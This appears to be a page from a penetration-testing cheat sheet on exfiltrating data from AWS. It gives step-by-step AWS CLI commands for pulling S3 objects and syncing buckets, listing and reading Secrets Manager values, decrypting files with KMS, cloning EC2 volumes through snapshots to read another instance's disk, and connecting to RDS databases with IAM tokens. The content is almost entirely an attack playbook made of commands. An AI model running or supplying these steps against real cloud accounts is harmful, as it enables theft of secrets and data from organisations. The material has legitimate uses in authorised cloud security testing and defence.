Data Exfiltration
- S3 Bucket Data Exfil
If its public, just enter the URL in the browser:
https://bucket-name.region.amazonaws.com/secret.txt
If its not public and we are an authenticated user:
aws s3api get-object --bucket name --key object-name download-file-location
We can also generate a time based url for an object and exfiltrate it like if it was public:
aws s3 presign s3://bucket-name/object-name --expires-in 605000
We can also download contents of a bucket with sync:
aws s3 ls s3://<bucketname>/
aws s3 sync s3://bucketname s3-files-dir
- Secret Manager Data Exfil
If the user has access to Secret Manager, it can decrypt the secrets.
To list policies attached to a user:
aws iam list-attached-user-policies --user-name <name>
To retrieve information about a specific version of a policy (Here we can see the permissions):
aws iam get-policy-version --policy-arn <arn> --version-id <id>
To list all secrets stored by AWS Secrets Manager:
aws secretsmanager list-secrets
To retrieve detailed information about a specific secret (Here we get the secret Key Id to decrypt the secret):
aws secretsmanager describe-secret --secret-id <name>
To get a resource-based policy attached to a specific secret:
aws secretsmanager get-resource-policy --secret-id <ID>
To retrieve the actual value of a secret (Retrieves the actual value):
aws secretsmanager get-secret-value --secret-id <ID>
KMS Operations (If we compromised, for example, an S3 with an encrypted file, we can decrypt it using the keys stored in KMS):
To describe a specific KMS key:
aws kms describe-key --key-id <id>
To list policies attached to a specified key (Here we can see who can access the key, the description of it, and so on):
aws kms list-key-policies --key-id <ID>
To list full information about a policy attached to a key (Run the previous command on all keys to see who can access them):
aws kms get-key-policy --policy-name <name> --key-id <ID>
To decrypt a secret using the key (There is no need to specify the key information because this information is embedded in the encrypted file):
aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext
- Volume from Snapshot Data Exfil
We can create a snapshot of an EC2 instance, create a volume from snapshot and attach to other EC2 instance if we have IAM permissions on EC2.
Maybe we don't have the right to access the instance but have rights to create a snapshot and attach it to another machine.
First, create a snapshot of a specified volume:
aws ec2 create-snapshot --volume volumeID --description "Example" --profile profile_name
List snapshots:
aws ec2 describe-snapshots
Creating a volume from a snasphot (needs to be in the same availability zone as the instance we have access):
aws ec2 create-volume --snapshot-id ID --availability-zone ZONE --profile profile_name
Attach the volume to an instance:
aws ec2 attach-volume --volume-id VolumeID --instance-id InstanceID --device /dev/sdfd -> Can be other value
Finally, mount the volume:
sudo mount /dev/sdfd /directory
- RDS Data Exfil
! If the instance is in a security group or VPC, we need to compromise it first to access the database.
List instances in RDS:
aws rds describe-db-instances
List information about the specified security group:
aws ec2 describe-security-groups --group-ids id
For password based authentication:
mysql -h hostname -u name -P port -p password
For IAM Based authentication, first identify the user:
aws sts get-caller-identity
Second, list all policies attached to a role:
aws iam list-attached-role-policies --role-name name
Third, get information about a specific version of a policy:
aws iam get-policy-version --policy-arn arn --version-id ID
Then, get a temporary token from the RDS:
aws rds generate-db-auth-token --hostname hostname --port port --username username --region region
We can put it in a variable:
TOKEN=$(aws rds generate-db-auth-token --hostname hostname --port port --username username --region region)
Finally, connect to the DB using the token:
mysql -h hostname -u name -P port --enable-cleartext-plugin --user=user --password=$TOKEN
Last updated